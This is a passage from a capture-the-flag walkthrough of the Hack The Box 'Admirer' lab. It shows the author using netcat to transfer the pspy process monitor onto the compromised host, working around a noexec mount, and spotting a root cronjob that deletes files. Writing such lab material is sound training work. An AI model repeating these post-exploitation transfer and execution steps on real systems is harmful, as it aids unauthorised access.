PSPY
A root cronjob process was found
┌──(kali㉿kali)-[~/archive/htb/labs/admirer]
└─$ nc $IP 2222 < pspy64
waldo@admirer:/~$ nc -nlvp 2222 > pspy64
listening on [any] 2222 ...
connect to [10.10.10.187] from (UNKNOWN) [10.10.16.8] 46690Delivery complete
waldo@admirer:/dev/shm$ sh ./pspy64
./pspy64: 1: ./pspy64: Syntax error: end of file unexpected (expecting ")")PSPY fails to execute
the /dev/shm (/run/shm) directory is mounted with noexec rule
waldo@admirer:/dev/shm$ mv ./pspy64 ~/ ; cd ~
waldo@admirer:/~$ chmod 755 ./pspy64Moving PSPY to the home directory
waldo@admirer:~$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
Cron
The root cronjob process is executing the following command; rm -r /tmp/*.* and rm /home/waldo/*.p*